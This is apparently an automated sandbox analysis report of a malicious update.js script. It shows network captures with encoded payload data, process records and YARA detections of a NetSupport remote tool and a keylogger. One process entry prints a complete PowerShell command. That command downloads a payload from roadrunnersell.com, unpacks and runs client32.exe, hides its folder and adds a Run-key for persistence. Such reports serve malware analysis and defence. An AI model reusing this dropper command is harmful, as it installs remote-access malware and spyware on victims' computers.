                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 2c 20 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 74 5c 72 5c 6e 20 5d 2b 7c 5b 5c 74 5c 72 5c 6e 20 5d 2b 24 2f 67 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 20 3d 20 6b 2e 73 74 72 69 6e 67 2e 69 6e 74 65 72 6e 61 6c 2e 74 72 69 6d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 4c 65 66 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 78 61 30 5d 2b 2f 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 52 69 67 68 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 73 5c 78 61 30 5d 2b 24 2f 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 63 61 73
                                                                              Data Ascii: , " ").replace(/^[\t\r\n ]+|[\t\r\n ]+$/g, "")};k.string.trim = k.string.internal.trim;k.string.trimLeft = function(a) { return a.replace(/^[\s\xa0]+/, "")};k.string.trimRight = function(a) { return a.replace(/[\s\xa0]+$/, "")};k.string.cas


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.164970579.141.163.1314436632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-09-25 17:02:35 UTC84OUTGET /trade/d.php?5517 HTTP/1.1
                                                                              Host: roadrunnersell.com
                                                                              Connection: Keep-Alive
                                                                              2024-09-25 17:02:35 UTC198INHTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:02:35 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Vary: Accept-Encoding
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              2024-09-25 17:02:35 UTC7994INData Raw: 32 65 35 38 36 38 0d 0a 55 45 73 44 42 42 51 41 41 41 41 49 41 42 78 45 56 31 65 64 6e 69 58 6d 4a 6d 77 41 41 4a 43 56 41 51 41 4d 41 41 41 41 59 32 78 70 5a 57 35 30 4d 7a 49 75 5a 58 68 6c 37 48 77 48 65 46 54 46 31 2f 66 5a 39 45 34 4b 41 53 4c 36 55 76 36 67 69 42 4a 42 6b 56 63 49 68 45 41 49 6e 59 54 30 73 70 75 79 32 56 52 71 67 43 53 41 45 41 56 52 2f 30 43 6f 41 6f 49 67 69 68 44 53 4e 79 47 46 6b 74 43 4c 51 42 41 51 61 55 6f 58 70 4b 54 33 6e 67 33 6e 4f 7a 4f 37 6d 77 49 4a 55 6f 4c 79 66 67 2f 6e 37 75 2f 65 6d 54 74 6e 7a 73 79 39 76 7a 4e 6e 5a 6d 35 34 6d 4f 43 78 43 6c 51 42 51 49 32 41 43 4c 41 48 35 47 49 46 66 79 39 2f 45 67 79 36 5a 42 70 41 75 76 61 5a 62 6e 73 45 34 38 39 30 63 77 6f 4b 6e 74 55 31 5a 4f 62 30 77 4a 6e 69 71 56 30
                                                                              Data Ascii: 2e5868UEsDBBQAAAAIABxEV1edniXmJmwAAJCVAQAMAAAAY2xpZW50MzIuZXhl7HwHeFTF1/fZ9E4KASL6Uv6giBJBkVcIhEAInYT0spuy2VRqgCSAEAVR/0CoAoIgihDSNyGFktCLQBAQaUoXpKT3ng3nOzO7mwIJUoLyfg/n7u/emTtnzsy9vzNnZm54mOCxClQBQI2ACLAH5GIFfy9/Egy6ZBpAuvaZbnsE4890cwoKntU1ZOb0wJniqV0
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 35 39 62 6c 4e 75 39 7a 37 6d 46 6c 56 69 35 68 49 68 31 32 46 7a 53 39 4f 36 53 52 54 37 70 53 4c 39 42 76 36 56 38 7a 2f 6a 6e 6e 33 2f 59 58 37 77 72 50 6a 58 2b 48 64 39 48 78 50 63 4e 44 48 65 51 36 39 74 51 50 46 2f 32 77 54 41 6b 37 46 4c 4d 4c 65 77 6a 50 6a 4a 77 51 63 50 48 75 43 44 2b 2f 63 78 76 36 51 53 62 31 77 38 67 30 6e 42 76 54 42 36 49 6d 43 38 55 50 38 70 37 4f 6e 52 66 41 4b 59 50 6d 38 6b 5a 70 4f 39 6e 50 77 69 4f 55 66 33 37 79 74 77 44 37 50 7a 38 76 46 42 66 6a 48 4e 43 38 36 34 62 51 78 67 77 74 50 59 46 65 72 7a 6d 4a 49 61 50 68 6a 76 33 61 66 2b 50 63 68 75 73 4d 6e 53 65 53 58 56 75 48 65 70 6b 4f 76 45 75 2b 73 32 71 35 74 4d 59 7a 2f 4a 6b 2f 67 33 49 2f 37 62 74 51 33 2f 7a 34 73 58 35 74 2f 74 35 66 43 66 46 62 65 55 6a
                                                                              Data Ascii: 59blNu9z7mFlVi5hIh12FzS9O6SRT7pSL9Bv6V8z/jnn3/YX7wrPjX+Hd9HxPcNDHeQ69tQPF/2wTAk7FLMLewjPjJwQcPHuCD+/cxv6QSb1w8g0nBvTB6ImC8UP8p7OnRfAKYPm8kZpO9nPwiOUf37ytwD7Pz8vFBfjHNC864bQxgwtPYFerzmJIaPhjv3af+PchusMnSeSXVuHepkOvEu+s2q5tMYz/Jk/g3I/7btQ3/z4sX5t/t5fCfFbeUj
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 51 62 67 4f 49 43 62 4e 32 36 6c 63 65 42 4a 69 78 66 76 72 77 4e 56 71 78 59 77 64 73 52 31 71 31 62 69 32 66 50 6e 6d 50 35 79 71 2b 52 2b 64 30 58 61 4e 6f 53 68 79 75 5a 4d 54 77 57 4d 73 58 44 70 50 6a 65 50 44 34 30 34 33 53 5a 63 62 76 55 4c 73 59 37 38 65 54 78 68 56 74 69 76 63 76 35 38 6e 6a 67 73 2f 47 7a 44 50 49 34 6d 34 6e 79 4d 38 55 69 76 6c 30 34 6a 2f 50 2f 38 4d 4d 50 51 32 6c 2f 4f 2b 6b 35 37 61 6d 6b 2f 48 65 64 37 58 31 70 58 55 62 2b 2b 43 54 76 31 32 76 59 57 74 6e 38 4e 53 35 6b 70 65 44 71 39 6a 6d 63 6e 35 79 62 48 4e 4c 34 78 31 4b 38 69 66 6e 46 4f 66 48 72 32 65 38 55 4c 34 78 69 42 74 30 70 53 6f 61 66 70 5a 53 2f 62 48 38 6f 38 61 64 31 32 7a 35 32 53 30 66 37 77 57 69 65 69 50 2b 58 33 36 37 44 39 6f 31 66 73 54 46 50 77
                                                                              Data Ascii: QbgOICbN26lceBJixfvrwNVqxYwdsR1q1bi2fPnmP5yq+R+d0XaNoShyuZMTwWMsXDpPjePD4043SZcbvULsY78eTxhVtivcv58njgs/GzDPI4m4nyM8Uivl04j/P/8MMPQ2l/O+k57amk/Hed7X1pXUb++CTv12vYWtn8NS5kpeDq9jmcn5ybHNL4x1K8ifnFOfHr2e8UL4xiBt0pSoafpZS/bH8o8ad12z52S0f7wWieiP+X367D9o1fsTFPw
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 56 61 47 56 47 46 43 65 5a 56 34 38 75 35 49 32 6d 4a 6c 63 48 2f 6c 66 4d 5a 2f 50 2b 54 74 76 78 49 2f 6d 4e 6a 46 2b 44 76 33 6b 36 39 44 48 58 70 62 2b 41 54 55 31 52 69 61 51 4f 52 46 53 44 53 36 39 47 75 42 31 46 51 35 38 46 64 66 6d 46 66 6b 33 59 51 67 38 51 52 78 6e 70 6f 30 70 48 5a 38 53 70 53 44 41 69 74 51 42 69 34 6d 63 4c 7a 31 4f 36 7a 55 4a 52 5a 44 30 42 56 72 72 30 57 34 48 49 70 4a 6c 36 4b 6f 39 33 56 62 4d 65 31 52 66 34 75 55 58 6a 6d 65 7a 51 50 45 4b 4d 68 30 42 69 6d 39 33 6f 76 72 44 66 34 64 70 4d 70 48 35 4a 6d 4e 6f 41 79 79 30 6e 67 32 57 46 31 37 53 67 45 54 74 62 54 31 76 50 44 67 7a 53 75 4e 56 50 64 32 6b 6f 47 58 32 4d 79 65 4f 6e 64 53 2b 72 50 5a 66 56 61 56 61 6f 76 42 48 30 65 62 62 6f 46 39 42 2f 79 4b 72 36 34 56
                                                                              Data Ascii: VaGVGFCeZV48u5I2mJlcH/lfMZ/P+TtvxI/mNjF+Dv3k69DHXpb+ATU1RiaQORFSDS69GuB1FQ58FdfmFfk3YQg8QRxnpo0pHZ8SpSDAitQBi4mcLz1O6zUJRZD0BVrr0W4HIpJl6Ko93VbMe1Rf4uUXjmezQPEKMh0Bim93ovrDf4dpMpH5JmNoAyy0ng2WF17SgETtbT1vPDgzSuNVPd2koGX2MyeOndS+rPZfVaVaovBH0ebboF9B/yKr64V
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 6b 52 54 65 6c 44 6b 4e 36 70 6a 6f 75 4c 71 35 70 74 2f 45 63 34 73 56 33 31 32 50 57 6f 4e 35 6c 44 55 42 32 44 48 71 44 65 2b 47 76 75 46 59 4e 5a 43 31 39 45 71 59 6b 68 72 6b 2b 45 6b 54 4c 51 36 72 57 49 48 6e 4d 36 52 53 44 50 62 32 56 4d 38 73 47 4c 4d 59 37 6f 35 72 36 65 42 78 6c 59 76 61 4b 58 65 5a 62 2b 38 57 6d 30 30 79 58 7a 69 33 6f 75 2b 68 6a 2b 39 69 63 53 30 55 4a 75 7a 4b 78 5a 39 79 48 62 48 36 37 37 43 44 34 2b 68 59 38 76 34 4f 4d 72 2b 50 67 61 50 72 36 44 6a 37 50 77 63 51 45 69 31 5a 7a 31 39 35 4f 67 67 41 67 42 79 39 35 6f 51 4f 35 42 31 71 32 47 31 47 49 36 38 63 55 59 62 64 33 37 39 32 68 57 7a 55 35 65 42 48 44 53 6f 58 72 35 30 4a 38 75 4d 77 68 38 4e 38 76 4e 79 63 54 66 64 78 53 59 2b 77 73 70 33 48 6b 57 50 66 52 77 43
                                                                              Data Ascii: kRTelDkN6pjouLq5pt/Ec4sV312PWoN5lDUB2DHqDe+GvuFYNZC19EqYkhrk+EkTLQ6rWIHnM6RSDPb2VM8sGLMY7o5r6eBxlYvaKXeZb+8Wm00yXzi3ou+hj+9icS0UJuzKxZ9yHbH677CD4+hY8v4OMr+PgaPr6Dj7PwcQEi1Zz195OggAgBy95oQO5B1q2G1GI68cUYbd3792hWzU5eBHDSoXr50J8uMwh8N8vNycTfdxSY+wsp3HkWPfRwC
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 50 78 6d 6b 67 34 36 31 36 37 4e 51 52 33 41 44 31 63 2f 34 5a 41 66 76 4e 4d 6a 6f 48 57 55 43 33 38 57 6d 44 4f 4b 72 59 48 55 75 74 76 73 78 76 71 63 2b 30 47 79 48 57 62 4b 75 2b 31 45 38 62 51 4f 61 5a 54 4c 72 6a 6a 7a 74 43 4e 4a 37 75 49 61 43 59 33 79 6e 50 5a 52 31 5a 78 4d 73 4f 66 61 32 4a 7a 53 6d 62 6a 2b 41 75 54 49 39 63 55 53 4a 51 39 70 75 61 2b 4c 4d 6d 52 46 44 44 4a 41 35 75 4e 73 73 63 73 4a 38 44 68 76 47 69 71 76 30 32 50 47 62 2b 51 47 30 6d 5a 6d 54 57 6c 7a 4a 78 56 41 74 67 59 71 59 2b 62 35 44 49 54 65 63 7a 6b 38 4a 6f 43 76 65 57 46 54 4c 36 5a 54 38 45 71 78 6a 49 63 58 6e 6a 73 5a 71 45 5a 6b 75 43 68 66 2f 6c 6d 2b 41 61 52 78 63 68 4e 2f 35 4c 2b 58 34 4a 56 4e 43 45 77 67 5a 46 76 49 2f 50 4d 63 67 62 37 75 44 54 35 56
                                                                              Data Ascii: Pxmkg46167NQR3AD1c/4ZAfvNMjoHWUC38WmDOKrYHUutvsxvqc+0GyHWbKu+1E8bQOaZTLrjjztCNJ7uIaCY3ynPZR1ZxMsOfa2JzSmbj+AuTI9cUSJQ9pua+LMmRFDDJA5uNsscsJ8DhvGiqv02PGb+QG0mZmTWlzJxVAtgYqY+b5DITeczk8JoCveWFTL6ZT8EqxjIcXnjsZqEZkuChf/lm+AaRxchN/5L+X4JVNCEwgZFvI/PMcgb7uDT5V
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 66 63 52 64 4e 73 30 4a 2f 48 4a 54 76 6e 75 31 5a 36 77 32 6a 6f 31 7a 59 6b 43 72 6e 6b 75 4d 70 79 72 34 37 6d 58 41 49 33 4a 55 78 73 4d 4d 2b 45 6e 57 64 77 4d 50 38 5a 59 66 75 4e 30 6a 4e 65 41 4f 57 44 2b 63 52 6f 47 4d 78 35 65 32 46 67 54 71 54 44 57 38 6f 74 4d 4a 6a 48 52 56 6f 37 53 68 76 4d 34 77 55 75 65 6d 55 65 56 75 36 6d 6f 36 37 42 53 6b 56 36 79 31 36 6f 5a 4b 7a 57 44 33 4f 35 39 30 4b 77 7a 4d 64 57 71 68 62 2f 74 57 51 69 36 43 59 38 4d 64 33 5a 77 6e 55 57 65 48 37 37 4b 49 41 45 76 6b 41 31 64 58 4e 69 56 7a 58 56 67 76 6c 4a 5a 4d 62 50 32 63 41 57 73 4d 35 43 79 6e 2f 64 76 34 74 71 79 6a 59 6b 6d 75 70 52 45 6a 70 62 7a 46 69 6c 57 2f 32 30 71 7a 34 43 4c 2f 48 46 50 2f 47 4d 38 6f 65 55 32 6a 4b 50 6f 55 70 53 34 4a 4a 44 37
                                                                              Data Ascii: fcRdNs0J/HJTvnu1Z6w2jo1zYkCrnkuMpyr47mXAI3JUxsMM+EnWdwMP8ZYfuN0jNeAOWD+cRoGMx5e2FgTqTDW8otMJjHRVo7ShvM4wUuemUeVu6mo67BSkV6y16oZKzWD3O590KwzMdWqhb/tWQi6CY8Md3ZwnUWeH77KIAEvkA1dXNiVzXVgvlJZMbP2cAWsM5Cyn/dv4tqyjYkmupREjpbzFilW/20qz4CL/HFP/GM8oeU2jKPoUpS4JJD7
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 70 4e 73 6b 45 77 43 73 6f 39 65 38 36 2f 33 68 35 64 50 57 79 39 6e 58 39 39 6d 64 75 67 2b 45 56 43 30 4e 67 67 66 56 6e 31 35 41 5a 7a 41 47 77 65 76 2f 37 6e 50 77 76 77 61 36 32 41 55 71 62 2b 6f 58 45 45 34 54 67 30 6c 76 7a 6c 30 64 69 45 67 50 79 73 6e 7a 79 58 50 7a 38 64 2b 66 50 7a 58 59 77 58 6c 52 64 6a 77 4d 77 74 4c 45 2f 4f 31 31 38 66 68 4d 79 68 73 57 72 6a 43 5a 31 32 76 64 78 68 47 78 47 45 35 66 63 50 6f 49 2f 52 33 51 4c 77 6d 68 32 61 63 61 55 38 36 57 58 6a 6d 4b 71 5a 39 44 67 5a 6e 39 52 2b 48 4d 73 49 79 34 6f 32 41 79 74 35 4d 73 73 63 57 77 44 55 74 63 2f 7a 62 6b 4e 52 67 69 44 4f 79 47 69 5a 6d 50 72 61 71 76 44 54 45 39 47 4d 36 68 38 6c 6e 62 70 32 42 72 43 6e 2f 52 6c 34 48 39 6d 57 74 43 55 6c 2f 4e 4a 55 4e 61 78 77 43
                                                                              Data Ascii: pNskEwCso9e86/3h5dPWy9nX99mdug+EVC0NggfVn15AZzAGwev/7nPwvwa62AUqb+oXEE4Tg0lvzl0diEgPysnzyXPz8d+fPzXYwXlRdjwMwtLE/O118fhMyhsWrjCZ12vdxhGxGE5fcPoI/R3QLwmh2acaU86WXjmKqZ9DgZn9R+HMsIy4o2Ayt5MsscWwDUtc/zbkNRgiDOyGiZmPraqvDTE9GM6h8lnbp2BrCn/Rl4H9mWtCUl/NJUNaxwC
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 62 51 4d 34 2b 65 30 2b 69 5a 53 38 2b 70 39 4a 78 43 7a 32 78 36 5a 74 45 7a 6b 35 34 5a 39 45 79 6a 70 34 4f 65 64 6e 72 61 36 4c 6b 56 74 2b 73 6d 31 39 47 7a 6e 70 34 4e 39 48 79 59 6e 6f 2f 53 38 33 46 36 50 6b 46 50 32 74 36 62 2f 41 77 39 6e 36 58 6e 62 6e 6f 2b 54 38 38 39 39 48 79 42 6e 76 76 70 2b 51 6f 39 51 2f 52 38 6a 5a 36 48 36 58 6d 45 35 32 6e 47 35 7a 76 30 33 6b 37 50 6b 2f 54 73 6f 47 63 6e 50 52 6b 39 54 39 47 7a 69 35 37 64 39 49 7a 53 73 34 2b 65 4a 73 72 48 52 6b 38 37 50 52 33 30 64 4e 49 7a 6a 5a 34 5a 39 4d 79 6b 5a 78 59 39 73 2b 6b 35 68 5a 35 54 36 5a 6c 4c 7a 32 6e 30 7a 4b 4e 6e 41 54 32 66 70 4f 63 38 65 70 62 53 73 34 2b 65 55 58 70 32 30 37 4f 4c 6e 71 66 6f 79 65 6a 5a 53 63 38 4f 65 70 36 6b 5a 7a 75 76 4c 7a 32 50 30
                                                                              Data Ascii: bQM4+e0+iZS8+p9JxCz2x6ZtEzk54Z9Eyjp4Oednra6LkVt+sm19Gznp4N9HyYno/S83F6PkFP2t6b/Aw9n6Xnbno+T8899HyBnvvp+Qo9Q/R8jZ6H6XmE52nG5zv03k7Pk/TsoGcnPRk9T9Gzi57d9IzSs4+eJsrHRk87PR30dNIzjZ4Z9MykZxY9s+k5hZ5T6ZlLz2n0zKNnAT2fpOc8epbSs4+eUXp207OLnqfoyejZSc8Oep6kZzuvLz2P0
                                                                              2024-09-25 17:02:35 UTC16384INData Raw: 63 36 2f 79 72 6c 58 30 6e 38 61 30 55 68 4e 68 4d 43 65 70 34 44 41 4a 44 72 4e 2f 58 47 62 46 5a 62 6a 62 6f 4d 46 58 45 79 71 4d 61 6e 69 77 72 57 39 6c 77 63 7a 53 74 34 4b 34 6d 59 55 48 63 66 70 64 61 75 67 37 52 58 56 4c 44 31 61 46 48 41 58 55 69 47 4a 74 4f 32 61 7a 51 41 48 66 49 73 45 32 35 4b 2f 2b 74 63 58 43 59 54 55 54 47 56 33 59 2f 35 4d 68 66 51 41 63 63 43 4e 64 39 55 6d 56 6f 4e 33 68 30 73 53 78 36 51 5a 50 56 39 39 46 74 4a 66 65 30 71 76 64 4f 72 30 32 6e 41 76 45 76 57 6d 76 52 47 6f 2b 37 36 4c 75 34 58 32 31 66 36 54 55 4d 31 4a 51 6f 48 57 2f 71 31 67 62 36 65 37 44 64 35 2b 66 69 70 61 6a 62 4d 51 6e 75 78 59 32 73 56 38 64 30 63 46 64 2b 53 64 58 46 31 56 54 4e 4d 4d 72 68 44 58 4c 31 67 4e 73 30 30 31 55 58 34 75 2b 73 77 6c
                                                                              Data Ascii: c6/yrlX0n8a0UhNhMCep4DAJDrN/XGbFZbjboMFXEyqManiwrW9lwczSt4K4mYUHcfpdaug7RXVLD1aFHAXUiGJtO2azQAHfIsE25K/+tcXCYTUTGV3Y/5MhfQAccCNd9UmVoN3h0sSx6QZPV99FtJfe0qvdOr02nAvEvWmvRGo+76Lu4X21f6TUM1JQoHW/q1gb6e7Dd5+fipajbMQnuxY2sV8d0cFd+SdXF1VTNMMrhDXL1gNs001UX4u+swl


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.164970979.141.163.1314436612C:\Windows\System32\wscript.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-09-25 17:02:49 UTC384OUTPOST /trade/fix.php?532 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-ch
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: roadrunnersell.com
                                                                              Content-Length: 7
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-09-25 17:02:49 UTC7OUTData Raw: 31 31 41 58 41 51 3d
                                                                              Data Ascii: 11AXAQ=
                                                                              2024-09-25 17:02:49 UTC166INHTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:02:49 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              3192.168.2.164971079.141.163.131443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-09-25 17:03:54 UTC384OUTPOST /trade/fix.php?532 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-ch
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: roadrunnersell.com
                                                                              Content-Length: 7
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-09-25 17:03:54 UTC7OUTData Raw: 31 31 41 58 41 51 3d
                                                                              Data Ascii: 11AXAQ=
                                                                              2024-09-25 17:03:54 UTC166INHTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:03:54 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:13:01:54
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js"
                                                                              Imagebase:0x7ff6843f0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:13:02:07
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                                                                              Imagebase:0x7ff6843f0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:10
                                                                              Start time:13:02:30
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                                                              Imagebase:0x7ff7582a0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E609F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E6081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E61D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E60AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E5E6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:13:02:30
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6684c0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:12
                                                                              Start time:13:02:30
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                                                                              Imagebase:0x7ff6843f0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:13
                                                                              Start time:13:02:37
                                                                              Start date:25/09/2024
                                                                              Path:C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe"
                                                                              Imagebase:0x9f0000
                                                                              File size:103'824 bytes
                                                                              MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.1597848713.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2636997048.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2728193047.000000006CBA0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 27%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:3.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:14
                                                                                Total number of Limit Nodes:1
